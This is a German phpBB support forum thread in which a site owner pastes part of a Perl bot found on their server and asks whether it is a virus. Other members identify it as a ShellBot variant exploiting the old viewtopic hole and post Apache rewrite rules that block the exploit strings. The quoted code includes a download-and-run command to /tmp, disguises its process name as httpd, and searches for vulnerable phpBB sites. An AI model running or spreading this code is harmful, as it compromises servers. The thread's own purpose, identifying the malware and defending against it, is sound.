Hilfe: phpBB-Virus???

Probleme bei der regulären Arbeiten mit phpBB, Fragen zu Vorgehensweisen oder Funktionsweise sowie sonstige Fragen zu phpBB im Allgemeinen.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Antworten
apos
Mitglied
Beiträge: 1
Registriert: 20.04.2006 09:57

Hilfe: phpBB-Virus???

Beitrag von apos »

Hallo,

ist dieses ein phpBB-Virus:
http://www.precisa-se.com.br/images/linuxdaybot.txt

http://www.precisa-se.com.br/images/linuxday.txt -O /tmp/.plain ;perl /tmp/.plain

###### psyclon.br@gmail.com ######

use strict;
use IO::Socket;
use IO::Handle;


my $process = '/usr/sbin/httpd';
$0="$process"."\0"x16;;
my $pid=fork;


sub fetch();
sub remote($);
sub http_query($);
sub encode($);

sub fetch(){
my $rnd=(int(rand(9999)));
my $s= (int(rand(1000)));
if ($rnd>1000) { $s= (int(rand(100)))}



my @str=(
"topic+%22by+phpBB+2.0.4%22+",
"topic+%22by+phpBB+2.0.5%22+",
"topic+%22by+phpBB+2.0.6%22+",
"topic+%22by+phpBB+2.0.7%22+",
"topic+%22by+phpBB+2.0.8%22+",
"topic+%22by+phpBB+2.0.9%22+",
"topic+%22by+phpBB+2.0.10%22+",
"topic+%22by+phpBB+2.0.3%22+",
);

my $query="search.msn.com.br/results.aspx?q=";
$query.=$str[(rand(scalar(@str)))].$rnd;
$query.="&first=$s";

my @lst=();
my $page = http_query($query);
while ($page =~ m/<a href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/msn|cache|hotmail/){
push (@lst,$1);
}
}

return (@lst);
}

sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
.....
.......
.........
............
...............
Vielleicht könnt ihr mir helfen

danke

apso
Benutzeravatar
StarWolf3000
Mitglied
Beiträge: 1019
Registriert: 25.07.2005 10:20
Wohnort: Stolpen
Kontaktdaten:

Beitrag von StarWolf3000 »

also, beim link zu linuxdaybot schlägt mein Virenscanner Alarm
möglich das es ein Virus ist (Perl/ShellBot.A oder so)
MOD-Einbauhilfe und Installationen über ICQ, TeamSpeak 2/3 und TeamViewer. Support nur im Forum, eingeschränkt per TeamViewer, aber nicht mehr per PN! • KB:knigge
Benutzeravatar
werhacktnet
Mitglied
Beiträge: 1
Registriert: 01.05.2006 20:55

Beitrag von werhacktnet »

aktuell aus meinem board geloggt:

http://mobile-portal.info/myfiles/expl/linuxday.txt
http://mobile-portal.info/myfiles/expl/linuxdaybot.txt

ist der alte viewtopic exploit, gibt nen fix:
http://www.phpbb.com/phpBB/viewtopic.php?t=240513
oder einfacher in httpd.conf vom apache:

Code: Alles auswählen

	
    # gegen exploit...
    RewriteEngine       on
    RewriteCond         %{THE_REQUEST}  ^.*/forum/.*system.chr.*$               [OR]
    RewriteCond         %{THE_REQUEST}  ^.*/forum/.*systemchr.*$                [OR]
    RewriteCond         %{THE_REQUEST}  ^.*/forum/.*include.*$                  [OR]
    RewriteCond         %{THE_REQUEST}  ^.*/forum/.*getenv.*HTTP_PHP.*$
    RewriteRule         .*              http://bierstube.treibts.org/error/fuckyou.php
Antworten

Zurück zu „phpBB 2.0: Administration, Benutzung und Betrieb“